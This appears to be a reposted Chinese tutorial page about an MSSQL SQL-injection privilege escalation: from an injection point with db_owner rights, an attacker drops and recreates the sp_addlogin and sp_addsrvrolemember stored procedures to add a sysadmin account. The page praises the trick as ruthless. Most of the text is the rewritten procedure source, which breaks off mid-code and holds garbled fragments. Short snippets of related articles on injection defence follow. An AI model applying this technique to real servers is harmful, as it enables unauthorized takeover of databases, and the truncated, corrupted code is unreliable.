SQL注入攻击通杀

2016-01-29 16:45 4 1 收藏

SQL注入攻击通杀,SQL注入攻击通杀

【 tulaoshi.com - SQLServer 】

 MSSQL注入通杀,只要有注入点就有系统权限 
  不知道大家看过这篇文章没有,可以在db_owner角色下添加SYSADMIN帐号,这招真狠啊,存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程,饶过了验证部分。具体方法如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure sp_addlogin
  @loginame sysname
  ,@passwd sysname = Null
  ,@defdb ; ; sysname = ’master’ -- UNDONE: DEFAULT
  CONFIGURABLE???
  ,@deflanguage sysname = Null
  ,@sid varbinary(16) = Null
  ,@encryptopt varchar(20) = Null
  AS
  -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
  set nocount on
  Declare @ret int -- return value of sp call
  -- DISALLOW USER TRANSACTION --
  set implicit_transactions off
  IF (@@trancount  0)
  begin
  raiserror(15002,-1,-1,’sp_addlogin’)
  return (1)
  end
  -- VALIDATE LOGIN NAME AS:
  -- (1) Valid SQL Name (SQL LOGIN)
  -- (2) No backslash (NT users only)
  -- (3) Not a reserved login name
  execute @ret = sp_validname @loginame
  if (@ret < 0)
  return (1)
  if (charindex(’’, @loginame)  0)
  begin
  raiserror(15006,-1,-1,@loginame)
  return (1)
  end
  --Note: different case sa is allowed.
  if (@loginame = ’sa’ or lower(@loginame) in (’public’))
  begin
  raiserror(15405, -1 ,-1, @loginame)
  return (1)
  end
  -- LOGIN NAME MUST NOT ALREADY EXIST --
  if exists(select * from master.dbo.syslogins where loginname =
  @loginame)
  begin
  raiserror(15025,-1,-1,@loginame)
  return (1)
  end
  -- VALIDATE DEFAULT DATABASE --
  IF db_id(@defdb) IS NULL
  begin
  raiserror(15010,-1,-1,@defdb)
  return (1)
  end
  -- VALIDATE DEFAULT LANGUAGE --
  IF (@deflanguage IS NOT Null)
  begin
  Execute @ret = sp_validlang @deflanguage
  IF (@ret < 0)
  return (1)
  end
  ELSE
  begin
  select @deflanguage = name from master.dbo.syslanguages
  where langid = @@default_langid --server default
  language
  if @deflanguage is null
  select @deflanguage = N’us_english’
  end
  -- VALIDATE SID IF GIVEN --
  if ((@sid IS NOT Null) and (datalength(@sid) < 16))
  begin
  raiserror(15419,-1,-1)
  return (1)
  end
  else if @sid is null
  select @sid = newid()
  if (suser_sname(@sid) IS NOT Null)
  begin
  raiserror(15433,-1,-1)
  return (1)
  end
  -- VALIDATE AND USE ENCRYPTION OPTION --
  declare @xstatus smallint
  select @xstatus = 2 -- access
  if @encryptopt is null
  select @passwd = pwdencrypt(@passwd)
  else if @encryptopt = ’skip_encryption_old’
  begin
  select @xstatus = @xstatus&nb

来源:https://www.tulaoshi.com/n/20160129/1499441.html

延伸阅读
标签: ASP
  学asp也有一段时间了,这几天一直在写自己的程序,也遇到了好多问题,我就不得不得考虑到一些现在的漏洞,比如,‘ 或 and 1=1等等的一些漏洞!别的先不管,今天我就来说说如何堵这个漏洞! 记得看了一篇文章(不记得什么时候看的了),他用到了instr这个函数,具体的应该是这样的。 If instr(Request("id")," ")0 or instr(...
标签: Web开发
现在基于web的攻击一般都是注入。导致注入的原因一般为对变量的过滤不完全,从而可以使入侵者非法执行程序或查询修改任意数据。随着注入攻击的愈演愈烈,一些专门的过滤代码应运而生。但一些过滤代码的不完善很可能导致新的攻击。下面就以目前应用最广泛的过滤代码--SQL通用防注入程序为下列说明漏洞的成因、利用方法及防范措施。 SQL...
标签: SQLServer
SQL Server上内置了加密术用来保护各种类型的敏感数据。在很多时候,这个加密术对于你来说是完全透明的;当数据被存储时候被加密,它们被使用的时候就会自动加密。在其他的情况下,你可以选择数据是否要被加密。SQL Server可以加密下列这些组件: ·密码 ·存储过程,视图,触发器,用户自定义函数,默认值,和规则。 ·在服务器和用户之间...
标签: Web开发
Dreamweaver+ASP可视化编程门槛很低,新手很容易上路。在很短的时间里,新手往往就已经能够编出看来比较完美的动态网站,在功能上,老手能做到的,新手也能够做到。那么新手与老手就没区别了吗?这里面区别可就大了,只不过外行人很难一眼就看出来罢了。界面的友好性、运行性能以及网站的安全性方面是新手与老手之间区别的三个集中点。 在安全...
标签: SQLServer
近段时间由于修改一个ASP程序(有SQL注入漏洞),在网上找了很多相关的一些防范办法,都不近人意,所以我将现在网上的一些方法综合改良了一下,写出这个ASP函数,供大家参考。 Function SafeRequest(ParaName) Dim ParaValue ParaValue=Request(ParaName) if IsNumeric(ParaValue) = True then SafeRequest=ParaValue exit Function elseIf...

经验教程

833

收藏

90

精华推荐

热门标签

微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部